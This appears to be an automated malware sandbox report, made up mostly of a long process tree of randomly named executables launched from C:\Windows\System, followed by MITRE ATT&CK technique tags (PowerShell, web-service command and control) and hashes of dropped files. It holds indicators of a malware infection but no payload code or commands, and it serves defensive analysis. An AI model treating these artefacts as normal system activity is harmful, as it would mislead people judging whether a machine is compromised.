- C:\Windows\System\pcBsVdv.exe
  C:\Windows\System\pcBsVdv.exe
  2⤵
  PID:7944
- C:\Windows\System\ghntwjA.exe
  C:\Windows\System\ghntwjA.exe
  2⤵
  PID:6780
- C:\Windows\System\CQvUlPg.exe
  C:\Windows\System\CQvUlPg.exe
  2⤵
  PID:7224
- C:\Windows\System\mlrfFUn.exe
  C:\Windows\System\mlrfFUn.exe
  2⤵
  PID:7876
- C:\Windows\System\zTEflpf.exe
  C:\Windows\System\zTEflpf.exe
  2⤵
  PID:7588
- C:\Windows\System\fpPNPZV.exe
  C:\Windows\System\fpPNPZV.exe
  2⤵
  PID:8236
- C:\Windows\System\pcKtlqw.exe
  C:\Windows\System\pcKtlqw.exe
  2⤵
  PID:8296
- C:\Windows\System\pNXbMig.exe
  C:\Windows\System\pNXbMig.exe
  2⤵
  PID:8324
- C:\Windows\System\swrfrNY.exe
  C:\Windows\System\swrfrNY.exe
  2⤵
  PID:8364
- C:\Windows\System\SEEHKQM.exe
  C:\Windows\System\SEEHKQM.exe
  2⤵
  PID:8408
- C:\Windows\System\Kbparjd.exe
  C:\Windows\System\Kbparjd.exe
  2⤵
  PID:8452
- C:\Windows\System\zblPRtl.exe
  C:\Windows\System\zblPRtl.exe
  2⤵
  PID:8504
- C:\Windows\System\uOCwuXv.exe
  C:\Windows\System\uOCwuXv.exe
  2⤵
  PID:8532
- C:\Windows\System\Ujgjkfu.exe
  C:\Windows\System\Ujgjkfu.exe
  2⤵
  PID:8560
- C:\Windows\System\iSGVwTb.exe
  C:\Windows\System\iSGVwTb.exe
  2⤵
  PID:8616
- C:\Windows\System\bSZnlmx.exe
  C:\Windows\System\bSZnlmx.exe
  2⤵
  PID:8652
- C:\Windows\System\lsMGoKN.exe
  C:\Windows\System\lsMGoKN.exe
  2⤵
  PID:8680
- C:\Windows\System\fDLMNCp.exe
  C:\Windows\System\fDLMNCp.exe
  2⤵
  PID:8700
- C:\Windows\System\UiIRVqA.exe
  C:\Windows\System\UiIRVqA.exe
  2⤵
  PID:8764
- C:\Windows\System\qISXVRN.exe
  C:\Windows\System\qISXVRN.exe
  2⤵
  PID:8812
- C:\Windows\System\XEKPsQI.exe
  C:\Windows\System\XEKPsQI.exe
  2⤵
  PID:8848
- C:\Windows\System\fiKzsSR.exe
  C:\Windows\System\fiKzsSR.exe
  2⤵
  PID:8892
- C:\Windows\System\snxkyQX.exe
  C:\Windows\System\snxkyQX.exe
  2⤵
  PID:8944
- C:\Windows\System\GRASIzY.exe
  C:\Windows\System\GRASIzY.exe
  2⤵
  PID:8972
- C:\Windows\System\ZZnZMCN.exe
  C:\Windows\System\ZZnZMCN.exe
  2⤵
  PID:9012
- C:\Windows\System\NrWaSys.exe
  C:\Windows\System\NrWaSys.exe
  2⤵
  PID:9056
- C:\Windows\System\SadVyPX.exe
  C:\Windows\System\SadVyPX.exe
  2⤵
  PID:9096
- C:\Windows\System\XgVLVur.exe
  C:\Windows\System\XgVLVur.exe
  2⤵
  PID:9136
- C:\Windows\System\DipaSwO.exe
  C:\Windows\System\DipaSwO.exe
  2⤵
  PID:9164
- C:\Windows\System\zCRcbYZ.exe
  C:\Windows\System\zCRcbYZ.exe
  2⤵
  PID:9184
- C:\Windows\System\SKWAhQe.exe
  C:\Windows\System\SKWAhQe.exe
  2⤵
  PID:9212
- C:\Windows\System\ESbNgvl.exe
  C:\Windows\System\ESbNgvl.exe
  2⤵
  PID:8216
- C:\Windows\System\FmgYcWi.exe
  C:\Windows\System\FmgYcWi.exe
  2⤵
  PID:8276
- C:\Windows\System\yXbZyIR.exe
  C:\Windows\System\yXbZyIR.exe
  2⤵
  PID:8320
- C:\Windows\System\nnNyYjc.exe
  C:\Windows\System\nnNyYjc.exe
  2⤵
  PID:8416
- C:\Windows\System\vqlAIKV.exe
  C:\Windows\System\vqlAIKV.exe
  2⤵
  PID:8404
- C:\Windows\System\agDedGz.exe
  C:\Windows\System\agDedGz.exe
  2⤵
  PID:8528
- C:\Windows\System\QBkLlLc.exe
  C:\Windows\System\QBkLlLc.exe
  2⤵
  PID:8512
- C:\Windows\System\tGNwfuc.exe
  C:\Windows\System\tGNwfuc.exe
  2⤵
  PID:8552
- C:\Windows\System\nTxxFDr.exe
  C:\Windows\System\nTxxFDr.exe
  2⤵
  PID:8672
- C:\Windows\System\KfGiuVX.exe
  C:\Windows\System\KfGiuVX.exe
  2⤵
  PID:8728
- C:\Windows\System\NzxQwuS.exe
  C:\Windows\System\NzxQwuS.exe
  2⤵
  PID:8740
- C:\Windows\System\PsKIOhp.exe
  C:\Windows\System\PsKIOhp.exe
  2⤵
  PID:8792
- C:\Windows\System\YRjZjXD.exe
  C:\Windows\System\YRjZjXD.exe
  2⤵
  PID:8832
- C:\Windows\System\giTahPE.exe
  C:\Windows\System\giTahPE.exe
  2⤵
  PID:8916
- C:\Windows\System\FKqqZKs.exe
  C:\Windows\System\FKqqZKs.exe
  2⤵
  PID:9004
- C:\Windows\System\jliZJNZ.exe
  C:\Windows\System\jliZJNZ.exe
  2⤵
  PID:9000
- C:\Windows\System\AxgUZEx.exe
  C:\Windows\System\AxgUZEx.exe
  2⤵
  PID:9092
- C:\Windows\System\OhIVeHE.exe
  C:\Windows\System\OhIVeHE.exe
  2⤵
  PID:9148
- C:\Windows\System\hcxkKVi.exe
  C:\Windows\System\hcxkKVi.exe
  2⤵
  PID:9200
- C:\Windows\System\XcYAACy.exe
  C:\Windows\System\XcYAACy.exe
  2⤵
  PID:8244
- C:\Windows\System\BBdpItg.exe
  C:\Windows\System\BBdpItg.exe
  2⤵
  PID:8308
- C:\Windows\System\cYPDMpG.exe
  C:\Windows\System\cYPDMpG.exe
  2⤵
  PID:8360
- C:\Windows\System\aKlIuOH.exe
  C:\Windows\System\aKlIuOH.exe
  2⤵
  PID:8524
- C:\Windows\System\hWwoXzr.exe
  C:\Windows\System\hWwoXzr.exe
  2⤵
  PID:8624
- C:\Windows\System\YoHvXwc.exe
  C:\Windows\System\YoHvXwc.exe
  2⤵
  PID:8840
- C:\Windows\System\NxwZUFO.exe
  C:\Windows\System\NxwZUFO.exe
  2⤵
  PID:8828
- C:\Windows\System\rxhNFDt.exe
  C:\Windows\System\rxhNFDt.exe
  2⤵
  PID:9040
- C:\Windows\System\fYQqtnS.exe
  C:\Windows\System\fYQqtnS.exe
  2⤵
  PID:9172
- C:\Windows\System\AjJJYqg.exe
  C:\Windows\System\AjJJYqg.exe
  2⤵
  PID:8440
- C:\Windows\System\QxQpHps.exe
  C:\Windows\System\QxQpHps.exe
  2⤵
  PID:8580
- C:\Windows\System\dxuZyBK.exe
  C:\Windows\System\dxuZyBK.exe
  2⤵
  PID:8872
- C:\Windows\System\ReTJnIt.exe
  C:\Windows\System\ReTJnIt.exe
  2⤵
  PID:8480
- C:\Windows\System\RvoWvsa.exe
  C:\Windows\System\RvoWvsa.exe
  2⤵
  PID:9180
- C:\Windows\System\VRdzvfn.exe
  C:\Windows\System\VRdzvfn.exe
  2⤵
  PID:8992
- C:\Windows\System\HEqVoDH.exe
  C:\Windows\System\HEqVoDH.exe
  2⤵
  PID:9176
- C:\Windows\System\mAixuao.exe
  C:\Windows\System\mAixuao.exe
  2⤵
  PID:8664
- C:\Windows\System\pAxvaYB.exe
  C:\Windows\System\pAxvaYB.exe
  2⤵
  PID:9232
- C:\Windows\System\esTcdMs.exe
  C:\Windows\System\esTcdMs.exe
  2⤵
  PID:9256
- C:\Windows\System\LlkaNNT.exe
  C:\Windows\System\LlkaNNT.exe
  2⤵
  PID:9300
- C:\Windows\System\GJuMWsg.exe
  C:\Windows\System\GJuMWsg.exe
  2⤵
  PID:9332
- C:\Windows\System\LCpofnl.exe
  C:\Windows\System\LCpofnl.exe
  2⤵
  PID:9364
- C:\Windows\System\ldtDwzS.exe
  C:\Windows\System\ldtDwzS.exe
  2⤵
  PID:9396
- C:\Windows\System\NCItIZA.exe
  C:\Windows\System\NCItIZA.exe
  2⤵
  PID:9432
- C:\Windows\System\wBlWECJ.exe
  C:\Windows\System\wBlWECJ.exe
  2⤵
  PID:9464
- C:\Windows\System\OOXGJqf.exe
  C:\Windows\System\OOXGJqf.exe
  2⤵
  PID:9496
- C:\Windows\System\OyjkBej.exe
  C:\Windows\System\OyjkBej.exe
  2⤵
  PID:9516
- C:\Windows\System\RpsUUfU.exe
  C:\Windows\System\RpsUUfU.exe
  2⤵
  PID:9556
- C:\Windows\System\caLmHiw.exe
  C:\Windows\System\caLmHiw.exe
  2⤵
  PID:9572
- C:\Windows\System\XqkPECc.exe
  C:\Windows\System\XqkPECc.exe
  2⤵
  PID:9612
- C:\Windows\System\iJTEgmo.exe
  C:\Windows\System\iJTEgmo.exe
  2⤵
  PID:9632
- C:\Windows\System\AQATTwM.exe
  C:\Windows\System\AQATTwM.exe
  2⤵
  PID:9668
- C:\Windows\System\lOaXEUP.exe
  C:\Windows\System\lOaXEUP.exe
  2⤵
  PID:9696
- C:\Windows\System\WpGCUCh.exe
  C:\Windows\System\WpGCUCh.exe
  2⤵
  PID:9724
- C:\Windows\System\MBXAiaj.exe
  C:\Windows\System\MBXAiaj.exe
  2⤵
  PID:9744
- C:\Windows\System\Yhggugd.exe
  C:\Windows\System\Yhggugd.exe
  2⤵
  PID:9768
- C:\Windows\System\gFOBnBA.exe
  C:\Windows\System\gFOBnBA.exe
  2⤵
  PID:9808
- C:\Windows\System\OgCNGTt.exe
  C:\Windows\System\OgCNGTt.exe
  2⤵
  PID:9836
- C:\Windows\System\diFmVHf.exe
  C:\Windows\System\diFmVHf.exe
  2⤵
  PID:9860
- C:\Windows\System\VbgqlXn.exe
  C:\Windows\System\VbgqlXn.exe
  2⤵
  PID:9892
- C:\Windows\System\gUjRcUN.exe
  C:\Windows\System\gUjRcUN.exe
  2⤵
  PID:9912
- C:\Windows\System\AuaEvZV.exe
  C:\Windows\System\AuaEvZV.exe
  2⤵
  PID:9976
- C:\Windows\System\JPyXgrK.exe
  C:\Windows\System\JPyXgrK.exe
  2⤵
  PID:9996
- C:\Windows\System\XvRoHqH.exe
  C:\Windows\System\XvRoHqH.exe
  2⤵
  PID:10032
- C:\Windows\System\mCLNPtM.exe
  C:\Windows\System\mCLNPtM.exe
  2⤵
  PID:10068
- C:\Windows\System\zwGXXwF.exe
  C:\Windows\System\zwGXXwF.exe
  2⤵
  PID:10116
- C:\Windows\System\RnUkUlK.exe
  C:\Windows\System\RnUkUlK.exe
  2⤵
  PID:10144
- C:\Windows\System\nltBRhu.exe
  C:\Windows\System\nltBRhu.exe
  2⤵
  PID:10180
- C:\Windows\System\DFHrHeg.exe
  C:\Windows\System\DFHrHeg.exe
  2⤵
  PID:10208
- C:\Windows\System\SnprNaa.exe
  C:\Windows\System\SnprNaa.exe
  2⤵
  PID:10224
- C:\Windows\System\GoIqvtf.exe
  C:\Windows\System\GoIqvtf.exe
  2⤵
  PID:9244
- C:\Windows\System\bdeGCZJ.exe
  C:\Windows\System\bdeGCZJ.exe
  2⤵
  PID:9296
- C:\Windows\System\nmVnKFB.exe
  C:\Windows\System\nmVnKFB.exe
  2⤵
  PID:9360
- C:\Windows\System\QOYcThS.exe
  C:\Windows\System\QOYcThS.exe
  2⤵
  PID:9392
- C:\Windows\System\CSLEQvs.exe
  C:\Windows\System\CSLEQvs.exe
  2⤵
  PID:9452
- C:\Windows\System\DMesHyJ.exe
  C:\Windows\System\DMesHyJ.exe
  2⤵
  PID:9532
- C:\Windows\System\vfPSfWs.exe
  C:\Windows\System\vfPSfWs.exe
  2⤵
  PID:9604
- C:\Windows\System\xQlopGy.exe
  C:\Windows\System\xQlopGy.exe
  2⤵
  PID:9660
- C:\Windows\System\CHBHHwB.exe
  C:\Windows\System\CHBHHwB.exe
  2⤵
  PID:9732
- C:\Windows\System\iTIaTat.exe
  C:\Windows\System\iTIaTat.exe
  2⤵
  PID:9828
- C:\Windows\System\MYFYoPE.exe
  C:\Windows\System\MYFYoPE.exe
  2⤵
  PID:9880
- C:\Windows\System\AcqEqcv.exe
  C:\Windows\System\AcqEqcv.exe
  2⤵
  PID:9924
- C:\Windows\System\ttTXVvU.exe
  C:\Windows\System\ttTXVvU.exe
  2⤵
  PID:10028
- C:\Windows\System\QaCzOXN.exe
  C:\Windows\System\QaCzOXN.exe
  2⤵
  PID:10088
- C:\Windows\System\sPpSNkV.exe
  C:\Windows\System\sPpSNkV.exe
  2⤵
  PID:10192
- C:\Windows\System\csCiDBi.exe
  C:\Windows\System\csCiDBi.exe
  2⤵
  PID:10220
- C:\Windows\System\doaDTXN.exe
  C:\Windows\System\doaDTXN.exe
  2⤵
  PID:9328
- C:\Windows\System\xSIvnfd.exe
  C:\Windows\System\xSIvnfd.exe
  2⤵
  PID:9504
- C:\Windows\System\jDxFSuB.exe
  C:\Windows\System\jDxFSuB.exe
  2⤵
  PID:9652
- C:\Windows\System\vcNjofH.exe
  C:\Windows\System\vcNjofH.exe
  2⤵
  PID:9848
- C:\Windows\System\UQsgtZP.exe
  C:\Windows\System\UQsgtZP.exe
  2⤵
  PID:10060
- C:\Windows\System\ifcnyvq.exe
  C:\Windows\System\ifcnyvq.exe
  2⤵
  PID:9284
- C:\Windows\System\YamrLui.exe
  C:\Windows\System\YamrLui.exe
  2⤵
  PID:9712
- C:\Windows\System\OhmjIOz.exe
  C:\Windows\System\OhmjIOz.exe
  2⤵
  PID:9412
- C:\Windows\System\BkxMgON.exe
  C:\Windows\System\BkxMgON.exe
  2⤵
  PID:10268
- C:\Windows\System\OFpYnWl.exe
  C:\Windows\System\OFpYnWl.exe
  2⤵
  PID:10312
- C:\Windows\System\AlBRlwh.exe
  C:\Windows\System\AlBRlwh.exe
  2⤵
  PID:10352
- C:\Windows\System\NxuYrdN.exe
  C:\Windows\System\NxuYrdN.exe
  2⤵
  PID:10404
- C:\Windows\System\eTVjSHU.exe
  C:\Windows\System\eTVjSHU.exe
  2⤵
  PID:10428
- C:\Windows\System\NWRJJhk.exe
  C:\Windows\System\NWRJJhk.exe
  2⤵
  PID:10472
- C:\Windows\System\qlDmyyH.exe
  C:\Windows\System\qlDmyyH.exe
  2⤵
  PID:10520
- C:\Windows\System\uXqVMnc.exe
  C:\Windows\System\uXqVMnc.exe
  2⤵
  PID:10556
- C:\Windows\System\SEDXozJ.exe
  C:\Windows\System\SEDXozJ.exe
  2⤵
  PID:10600
- C:\Windows\System\cSXLpxh.exe
  C:\Windows\System\cSXLpxh.exe
  2⤵
  PID:10636
- C:\Windows\System\BJyEfwV.exe
  C:\Windows\System\BJyEfwV.exe
  2⤵
  PID:10668
- C:\Windows\System\KSVMorC.exe
  C:\Windows\System\KSVMorC.exe
  2⤵
  PID:10696
- C:\Windows\System\tazAvEa.exe
  C:\Windows\System\tazAvEa.exe
  2⤵
  PID:10724
- C:\Windows\System\fYLHXEy.exe
  C:\Windows\System\fYLHXEy.exe
  2⤵
  PID:10740
- C:\Windows\System\bNCNYxd.exe
  C:\Windows\System\bNCNYxd.exe
  2⤵
  PID:10780
- C:\Windows\System\cxdxOaT.exe
  C:\Windows\System\cxdxOaT.exe
  2⤵
  PID:10812
- C:\Windows\System\mhWDnGv.exe
  C:\Windows\System\mhWDnGv.exe
  2⤵
  PID:10840
- C:\Windows\System\SpqQaXJ.exe
  C:\Windows\System\SpqQaXJ.exe
  2⤵
  PID:10860
- C:\Windows\System\fKwkOLK.exe
  C:\Windows\System\fKwkOLK.exe
  2⤵
  PID:10892
- C:\Windows\System\EkweCXW.exe
  C:\Windows\System\EkweCXW.exe
  2⤵
  PID:10916
- C:\Windows\System\qGKrZfF.exe
  C:\Windows\System\qGKrZfF.exe
  2⤵
  PID:10948
- C:\Windows\System\sGmSuvU.exe
  C:\Windows\System\sGmSuvU.exe
  2⤵
  PID:10976
- C:\Windows\System\nAlJueV.exe
  C:\Windows\System\nAlJueV.exe
  2⤵
  PID:11016
- C:\Windows\System\cGxmHdX.exe
  C:\Windows\System\cGxmHdX.exe
  2⤵
  PID:11040
- C:\Windows\System\ZxFwjgj.exe
  C:\Windows\System\ZxFwjgj.exe
  2⤵
  PID:11064
- C:\Windows\System\pSAZzeF.exe
  C:\Windows\System\pSAZzeF.exe
  2⤵
  PID:11092
- C:\Windows\System\fWPCYBb.exe
  C:\Windows\System\fWPCYBb.exe
  2⤵
  PID:11140
- C:\Windows\System\TpRMmLO.exe
  C:\Windows\System\TpRMmLO.exe
  2⤵
  PID:11156
- C:\Windows\System\jzLPmTg.exe
  C:\Windows\System\jzLPmTg.exe
  2⤵
  PID:11208
- C:\Windows\System\MgZGqbj.exe
  C:\Windows\System\MgZGqbj.exe
  2⤵
  PID:11236
- C:\Windows\System\evuEFpQ.exe
  C:\Windows\System\evuEFpQ.exe
  2⤵
  PID:10244
- C:\Windows\System\fkCXNaA.exe
  C:\Windows\System\fkCXNaA.exe
  2⤵
  PID:10336
- C:\Windows\System\ofMMoWK.exe
  C:\Windows\System\ofMMoWK.exe
  2⤵
  PID:10436
- C:\Windows\System\HBLblTl.exe
  C:\Windows\System\HBLblTl.exe
  2⤵
  PID:10540
- C:\Windows\System\AGbAqpW.exe
  C:\Windows\System\AGbAqpW.exe
  2⤵
  PID:10624
- C:\Windows\System\fdzJsVj.exe
  C:\Windows\System\fdzJsVj.exe
  2⤵
  PID:10708
- C:\Windows\System\YhkMpCg.exe
  C:\Windows\System\YhkMpCg.exe
  2⤵
  PID:10768
- C:\Windows\System\SAASAMX.exe
  C:\Windows\System\SAASAMX.exe
  2⤵
  PID:10832
- C:\Windows\System\AWjfQlf.exe
  C:\Windows\System\AWjfQlf.exe
  2⤵
  PID:10908
- C:\Windows\System\DErjUzP.exe
  C:\Windows\System\DErjUzP.exe
  2⤵
  PID:10960
- C:\Windows\System\iDnRvIU.exe
  C:\Windows\System\iDnRvIU.exe
  2⤵
  PID:11028
- C:\Windows\System\CDZpVUg.exe
  C:\Windows\System\CDZpVUg.exe
  2⤵
  PID:11104
- C:\Windows\System\onAENWz.exe
  C:\Windows\System\onAENWz.exe
  2⤵
  PID:11184
- C:\Windows\System\RyFeHAt.exe
  C:\Windows\System\RyFeHAt.exe
  2⤵
  PID:11256
- C:\Windows\System\ZRvAbaP.exe
  C:\Windows\System\ZRvAbaP.exe
  2⤵
  PID:10464
- C:\Windows\System\JYTFCwC.exe
  C:\Windows\System\JYTFCwC.exe
  2⤵
  PID:10680
- C:\Windows\System\oQJKHzm.exe
  C:\Windows\System\oQJKHzm.exe
  2⤵
  PID:10792
- C:\Windows\System\QzDkLSj.exe
  C:\Windows\System\QzDkLSj.exe
  2⤵
  PID:11000
- C:\Windows\System\YuprgyD.exe
  C:\Windows\System\YuprgyD.exe
  2⤵
  PID:11084
- C:\Windows\System\bvhCPvu.exe
  C:\Windows\System\bvhCPvu.exe
  2⤵
  PID:10584
- C:\Windows\System\viXtMLy.exe
  C:\Windows\System\viXtMLy.exe
  2⤵
  PID:10808
- C:\Windows\System\pZZOYtE.exe
  C:\Windows\System\pZZOYtE.exe
  2⤵
  PID:10412
- C:\Windows\System\ZGRPQut.exe
  C:\Windows\System\ZGRPQut.exe
  2⤵
  PID:10800
- C:\Windows\System\doAAEfW.exe
  C:\Windows\System\doAAEfW.exe
  2⤵
  PID:11284
- C:\Windows\System\esTTsjP.exe
  C:\Windows\System\esTTsjP.exe
  2⤵
  PID:11300
- C:\Windows\System\qECgGLK.exe
  C:\Windows\System\qECgGLK.exe
  2⤵
  PID:11344
- C:\Windows\System\PznjFRU.exe
  C:\Windows\System\PznjFRU.exe
  2⤵
  PID:11372
- C:\Windows\System\IklpnTu.exe
  C:\Windows\System\IklpnTu.exe
  2⤵
  PID:11412
- C:\Windows\System\bZJvxit.exe
  C:\Windows\System\bZJvxit.exe
  2⤵
  PID:11432
- C:\Windows\System\DGiPrli.exe
  C:\Windows\System\DGiPrli.exe
  2⤵
  PID:11460
- C:\Windows\System\dnEcLXS.exe
  C:\Windows\System\dnEcLXS.exe
  2⤵
  PID:11488
- C:\Windows\System\gpDLOOV.exe
  C:\Windows\System\gpDLOOV.exe
  2⤵
  PID:11508
- C:\Windows\System\gnaMrhS.exe
  C:\Windows\System\gnaMrhS.exe
  2⤵
  PID:11548
- C:\Windows\System\vzeLBAv.exe
  C:\Windows\System\vzeLBAv.exe
  2⤵
  PID:11584
- C:\Windows\System\CBIyTvP.exe
  C:\Windows\System\CBIyTvP.exe
  2⤵
  PID:11608
- C:\Windows\System\zrNrWku.exe
  C:\Windows\System\zrNrWku.exe
  2⤵
  PID:11640
- C:\Windows\System\erIOcHj.exe
  C:\Windows\System\erIOcHj.exe
  2⤵
  PID:11688
- C:\Windows\System\hYOqJrk.exe
  C:\Windows\System\hYOqJrk.exe
  2⤵
  PID:11728
- C:\Windows\System\rdBTRhT.exe
  C:\Windows\System\rdBTRhT.exe
  2⤵
  PID:11756
- C:\Windows\System\hZjrGln.exe
  C:\Windows\System\hZjrGln.exe
  2⤵
  PID:11784
- C:\Windows\System\chSxBJf.exe
  C:\Windows\System\chSxBJf.exe
  2⤵
  PID:11812
- C:\Windows\System\DauPfLo.exe
  C:\Windows\System\DauPfLo.exe
  2⤵
  PID:11840
- C:\Windows\System\jZAGSWV.exe
  C:\Windows\System\jZAGSWV.exe
  2⤵
  PID:11868
- C:\Windows\System\OtTfIRP.exe
  C:\Windows\System\OtTfIRP.exe
  2⤵
  PID:11896
- C:\Windows\System\cGpydyQ.exe
  C:\Windows\System\cGpydyQ.exe
  2⤵
  PID:11924
- C:\Windows\System\qjrcQob.exe
  C:\Windows\System\qjrcQob.exe
  2⤵
  PID:11960
- C:\Windows\System\DTVrOSH.exe
  C:\Windows\System\DTVrOSH.exe
  2⤵
  PID:11988
- C:\Windows\System\UDuLzBZ.exe
  C:\Windows\System\UDuLzBZ.exe
  2⤵
  PID:12020
- C:\Windows\System\qPWADQN.exe
  C:\Windows\System\qPWADQN.exe
  2⤵
  PID:12044
- C:\Windows\System\MIOdCjx.exe
  C:\Windows\System\MIOdCjx.exe
  2⤵
  PID:12064
- C:\Windows\System\EdLcXdG.exe
  C:\Windows\System\EdLcXdG.exe
  2⤵
  PID:12104
- C:\Windows\System\csNrIMK.exe
  C:\Windows\System\csNrIMK.exe
  2⤵
  PID:12144
- C:\Windows\System\iPkbiiq.exe
  C:\Windows\System\iPkbiiq.exe
  2⤵
  PID:12160
- C:\Windows\System\ZAKQyzL.exe
  C:\Windows\System\ZAKQyzL.exe
  2⤵
  PID:12188
- C:\Windows\System\ELZbGPn.exe
  C:\Windows\System\ELZbGPn.exe
  2⤵
  PID:12216
- C:\Windows\System\OALTqIK.exe
  C:\Windows\System\OALTqIK.exe
  2⤵
  PID:12244
- C:\Windows\System\GgetKFf.exe
  C:\Windows\System\GgetKFf.exe
  2⤵
  PID:12272
- C:\Windows\System\GYjHHie.exe
  C:\Windows\System\GYjHHie.exe
  2⤵
  PID:11292
- C:\Windows\System\LjRgeOy.exe
  C:\Windows\System\LjRgeOy.exe
  2⤵
  PID:11360
- C:\Windows\System\nRCgLxM.exe
  C:\Windows\System\nRCgLxM.exe
  2⤵
  PID:11384
- C:\Windows\System\JgbRCaM.exe
  C:\Windows\System\JgbRCaM.exe
  2⤵
  PID:9800
- C:\Windows\System\FMiBcoj.exe
  C:\Windows\System\FMiBcoj.exe
  2⤵
  PID:11444
- C:\Windows\System\MIdNEAh.exe
  C:\Windows\System\MIdNEAh.exe
  2⤵
  PID:11500
- C:\Windows\System\loGQDwp.exe
  C:\Windows\System\loGQDwp.exe
  2⤵
  PID:3092
- C:\Windows\System\iNWWoKh.exe
  C:\Windows\System\iNWWoKh.exe
  2⤵
  PID:11660
- C:\Windows\System\lCTTgRB.exe
  C:\Windows\System\lCTTgRB.exe
  2⤵
  PID:11752
- C:\Windows\System\bRgIGqd.exe
  C:\Windows\System\bRgIGqd.exe
  2⤵
  PID:11824
- C:\Windows\System\Aizledn.exe
  C:\Windows\System\Aizledn.exe
  2⤵
  PID:11888
- C:\Windows\System\ZDXXJSj.exe
  C:\Windows\System\ZDXXJSj.exe
  2⤵
  PID:11956
- C:\Windows\System\QTWKwqe.exe
  C:\Windows\System\QTWKwqe.exe
  2⤵
  PID:12036
- C:\Windows\System\aXjNGZE.exe
  C:\Windows\System\aXjNGZE.exe
  2⤵
  PID:12100
- C:\Windows\System\gDGYwRX.exe
  C:\Windows\System\gDGYwRX.exe
  2⤵
  PID:2020
- C:\Windows\System\KZcSwtm.exe
  C:\Windows\System\KZcSwtm.exe
  2⤵
  PID:12228
- C:\Windows\System\bOKBbDL.exe
  C:\Windows\System\bOKBbDL.exe
  2⤵
  PID:11276
- C:\Windows\System\jbDTJDD.exe
  C:\Windows\System\jbDTJDD.exe
  2⤵
  PID:11396
- C:\Windows\System\GMCaTes.exe
  C:\Windows\System\GMCaTes.exe
  2⤵
  PID:11496
- C:\Windows\System\wwMalGX.exe
  C:\Windows\System\wwMalGX.exe
  2⤵
  PID:11700
- C:\Windows\System\vdTnnPE.exe
  C:\Windows\System\vdTnnPE.exe
  2⤵
  PID:11880
- C:\Windows\System\mkClmwb.exe
  C:\Windows\System\mkClmwb.exe
  2⤵
  PID:12152
- C:\Windows\System\ZpsXmsc.exe
  C:\Windows\System\ZpsXmsc.exe
  2⤵
  PID:11424
- C:\Windows\System\dfJSRso.exe
  C:\Windows\System\dfJSRso.exe
  2⤵
  PID:11852
- C:\Windows\System\eusZvFx.exe
  C:\Windows\System\eusZvFx.exe
  2⤵
  PID:11364
- C:\Windows\System\EoiKLjs.exe
  C:\Windows\System\EoiKLjs.exe
  2⤵
  PID:11336
- C:\Windows\System\mkzUdrf.exe
  C:\Windows\System\mkzUdrf.exe
  2⤵
  PID:12296
- C:\Windows\System\oRBPMVo.exe
  C:\Windows\System\oRBPMVo.exe
  2⤵
  PID:12324
- C:\Windows\System\zUicKRi.exe
  C:\Windows\System\zUicKRi.exe
  2⤵
  PID:12352
- C:\Windows\System\NDEnzXl.exe
  C:\Windows\System\NDEnzXl.exe
  2⤵
  PID:12380
- C:\Windows\System\cuZNSud.exe
  C:\Windows\System\cuZNSud.exe
  2⤵
  PID:12408
- C:\Windows\System\tDXnRdl.exe
  C:\Windows\System\tDXnRdl.exe
  2⤵
  PID:12436
- C:\Windows\System\LjPcKPk.exe
  C:\Windows\System\LjPcKPk.exe
  2⤵
  PID:12464
- C:\Windows\System\RcSGhLf.exe
  C:\Windows\System\RcSGhLf.exe
  2⤵
  PID:12492
- C:\Windows\System\UIrqivY.exe
  C:\Windows\System\UIrqivY.exe
  2⤵
  PID:12508
- C:\Windows\System\ezFSqFf.exe
  C:\Windows\System\ezFSqFf.exe
  2⤵
  PID:12548
- C:\Windows\System\fOvOFAd.exe
  C:\Windows\System\fOvOFAd.exe
  2⤵
  PID:12576
- C:\Windows\System\FjTFyYK.exe
  C:\Windows\System\FjTFyYK.exe
  2⤵
  PID:12604
- C:\Windows\System\ZQWnUmi.exe
  C:\Windows\System\ZQWnUmi.exe
  2⤵
  PID:12632
- C:\Windows\System\ieLrGAm.exe
  C:\Windows\System\ieLrGAm.exe
  2⤵
  PID:12660
- C:\Windows\System\aZOXyNN.exe
  C:\Windows\System\aZOXyNN.exe
  2⤵
  PID:12688
- C:\Windows\System\nUVkJdw.exe
  C:\Windows\System\nUVkJdw.exe
  2⤵
  PID:12716
- C:\Windows\System\UHIElCE.exe
  C:\Windows\System\UHIElCE.exe
  2⤵
  PID:12744
- C:\Windows\System\OOqowIy.exe
  C:\Windows\System\OOqowIy.exe
  2⤵
  PID:12772
- C:\Windows\System\WyzSiAm.exe
  C:\Windows\System\WyzSiAm.exe
  2⤵
  PID:12800
- C:\Windows\System\ynwxQNP.exe
  C:\Windows\System\ynwxQNP.exe
  2⤵
  PID:12828
- C:\Windows\System\tYpSJvf.exe
  C:\Windows\System\tYpSJvf.exe
  2⤵
  PID:12856
- C:\Windows\System\eyicWZi.exe
  C:\Windows\System\eyicWZi.exe
  2⤵
  PID:12884
- C:\Windows\System\KqavqeD.exe
  C:\Windows\System\KqavqeD.exe
  2⤵
  PID:12912
- C:\Windows\System\sIXwOSE.exe
  C:\Windows\System\sIXwOSE.exe
  2⤵
  PID:12940
- C:\Windows\System\YjtuBmE.exe
  C:\Windows\System\YjtuBmE.exe
  2⤵
  PID:12968
- C:\Windows\System\RjEEjqJ.exe
  C:\Windows\System\RjEEjqJ.exe
  2⤵
  PID:12996
- C:\Windows\System\GDWmDAg.exe
  C:\Windows\System\GDWmDAg.exe
  2⤵
  PID:13024
- C:\Windows\System\XcmeVTe.exe
  C:\Windows\System\XcmeVTe.exe
  2⤵
  PID:13052
- C:\Windows\System\nGZTkUn.exe
  C:\Windows\System\nGZTkUn.exe
  2⤵
  PID:13080
- C:\Windows\System\SQqBEzJ.exe
  C:\Windows\System\SQqBEzJ.exe
  2⤵
  PID:13108

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_4bs35lzn.fdv.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Windows\System\AwwaPwS.exe

Filesize
3.2MB

